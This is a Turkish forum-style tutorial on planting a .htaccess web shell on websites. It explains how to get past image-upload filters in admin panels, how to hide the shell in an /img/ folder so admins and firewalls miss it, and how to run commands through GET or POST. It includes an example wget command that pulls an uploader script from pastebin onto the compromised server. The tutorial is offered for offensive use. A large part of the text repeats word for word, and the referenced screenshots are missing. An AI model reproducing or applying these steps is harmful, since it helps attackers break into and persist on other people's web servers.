1.Bilirsiniz'ki bazi sitelerin admin panelinde resim ekleme yerinde '.php ,html ' filtresi oluyor dosya yüklenmiyor falan filan .htaccess shell'imizi yükleyebiliriz .htaccess biliyorsunuz herşey'e yarıyor bypass methodu olarak.
2.ci olarak servere shell attiniz ama sunucuda firewall var shell siliniyor diyelim yada admin'i farketti tarattı falan genellikle /img/ bölümünde .htaccess oluyor admin biliyor orda oldugunu farketmez yani bu shell ile gizlenebilirsiniz.
3.cüsü .htacces shell ile (cmd komudu çaliştirabiliyoruz POST Methodu ile çalişiyor. POST engelliyse GET VAR)
bu bildigimiz cmd komudu ile ln-s cat fonksiyonlari açıksa serverde herşey yapabilirsiniz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
4.cüsü Buda GET Methoduyla çalışıyo bunlada etc okuyabilirsiniz wget komudu ile dosya'da çekebilirsiniz. örnek olarak :
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
.htaccess?cmd= shell adresimininizin sonuna gelicek
örnek dosya çekme işlemi:
shelladresi.com/.htaccess?cmd=wget -O hatun.phphttps://pastebin.com/raw/qG6QpiYR (upluad kodu)
dedikten sonra shell yolumuz ;shelladresi.com/hatun.php oluyor pastebindeki upluad kodunu çekiyor ve dosya upluad edebiliyorsunuz.
ben bunla uğraşmam derseniz hazir olarak sadece .htaccess olarak bu kodu atarsınız servere
direkt uğraşmadan upluad'da yapabilirsiniz.
2.ci olarak servere shell attiniz ama sunucuda firewall var shell siliniyor diyelim yada admin'i farketti tarattı falan genellikle /img/ bölümünde .htaccess oluyor admin biliyor orda oldugunu farketmez yani bu shell ile gizlenebilirsiniz.
3.cüsü .htacces shell ile (cmd komudu çaliştirabiliyoruz POST Methodu ile çalişiyor. POST engelliyse GET VAR)
bu bildigimiz cmd komudu ile ln-s cat fonksiyonlari açıksa serverde herşey yapabilirsiniz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
4.cüsü Buda GET Methoduyla çalışıyo bunlada etc okuyabilirsiniz wget komudu ile dosya'da çekebilirsiniz. örnek olarak :
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
.htaccess?cmd= shell adresimininizin sonuna gelicek
örnek dosya çekme işlemi:
shelladresi.com/.htaccess?cmd=wget -O hatun.phphttps://pastebin.com/raw/qG6QpiYR (upluad kodu)
dedikten sonra shell yolumuz ;shelladresi.com/hatun.php oluyor pastebindeki upluad kodunu çekiyor ve dosya upluad edebiliyorsunuz.
ben bunla uğraşmam derseniz hazir olarak sadece .htaccess olarak bu kodu atarsınız servere
direkt uğraşmadan upluad'da yapabilirsiniz.
